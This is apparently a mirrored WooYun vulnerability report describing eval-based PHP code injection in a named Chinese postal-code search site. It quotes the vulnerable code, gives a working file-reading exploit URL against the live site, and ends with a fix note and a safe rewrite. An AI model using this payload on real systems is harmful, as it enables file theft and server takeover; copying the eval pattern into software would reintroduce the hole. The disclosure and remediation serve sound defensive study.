WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reading -------- http://drop.zone.ci/
2014-01-16: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2014-03-02: The vendor has actively ignored the vulnerability; details are disclosed to the public.
// Vulnerable code as reported: $keyword[$ai] (user search input) is interpolated into a
// string of PHP source that is then passed to eval(), so the input is executed as code.
switch ($_GET['w']) {
    case "sheng":
        @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[0]\");");
        break;
    case "diqu":
        @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[1]\");");
        break;
    case "shi":
        @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[2]\");");
        break;
    case "cun":
        @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[3]\");");
        break;
    case "youbian":
        @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[4]\");");
        break;
    case "quhao":
        @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[5]\");");
        break;
    default:
        @eval("\$found = eregi(\"$keyword[$ai]\",\"$dreamdb[$i]\");");
        break;
}
http://www.bato.cn/tool/youbian?q=%24%7B%40exit%28print_r%28file%28%24_GET%5Bd%5D%29%29%29%7D
In the original code, $keyword is the search text entered by the user and is concatenated directly into PHP code.
// The same vulnerable switch in its loop context: every keyword is run through eval() in turn.
for ($ai = 0; $ai < $dreamcount; $ai++) {
    switch ($_GET['w']) {
        case "sheng":
            @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[0]\");");
            break;
        case "diqu":
            @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[1]\");");
            break;
        case "shi":
            @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[2]\");");
            break;
        case "cun":
            @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[3]\");");
            break;
        case "youbian":
            @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[4]\");");
            break;
        case "quhao":
            @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[5]\");");
            break;
        default:
            @eval("\$found = eregi(\"$keyword[$ai]\",\"$dreamdb[$i]\");");
            break;
    }
}
Fix: do not use the eval function; remove the sensitive code.
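As an added example (not code from the report or from the affected site), the same keyword lookup written without eval: the field name from `w` is checked against a whitelist, and each keyword is handed to preg_match as a data argument, so text such as `${...}` in the input is never interpolated into PHP source. It assumes the row layout the report implies (field names sheng/diqu/shi/cun/youbian/quhao mapping to indexes 0..5 of $detail) and that all keywords must match, which is an assumption, not the original semantics.

```php
<?php
// Added example, not from the original report. Assumed field-name -> column mapping.
const FIELD_INDEX = [
    'sheng'   => 0,
    'diqu'    => 1,
    'shi'     => 2,
    'cun'     => 3,
    'youbian' => 4,
    'quhao'   => 5,
];

/**
 * Return true if every keyword occurs (case-insensitively) in the selected field of $detail,
 * or in $fallback when no field was requested. Unknown field names are rejected.
 * The keyword goes into preg_match as data, so nothing from the request reaches eval().
 * preg_quote makes the match literal; drop it only if regex input is actually wanted.
 */
function keyword_match(array $keywords, ?string $field, array $detail, string $fallback): bool
{
    if ($field !== null && !array_key_exists($field, FIELD_INDEX)) {
        return false; // not whitelisted: refuse instead of falling through
    }
    $haystack = ($field === null) ? $fallback : (string)($detail[FIELD_INDEX[$field]] ?? '');
    foreach ($keywords as $kw) {
        $kw = (string)$kw;
        if ($kw === '') {
            continue;
        }
        // No /u flag: the original data may not be UTF-8; preg_match then treats bytes literally.
        if (preg_match('/' . preg_quote($kw, '/') . '/i', $haystack) !== 1) {
            return false;
        }
    }
    return true;
}

// Constructed sample row and inputs (not real data from the site).
$detail = ['Beijing', 'Haidian', 'Beijing', 'Zhongguancun', '100080', '010'];
$field  = $_GET['w'] ?? null;                 // e.g. "diqu"
$words  = explode(' ', (string)($_GET['q'] ?? '')); // the former $keyword array
var_dump(keyword_match($words, $field, $detail, implode(' ', $detail)));
```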
Unable to contact the vendor, or the vendor actively refused.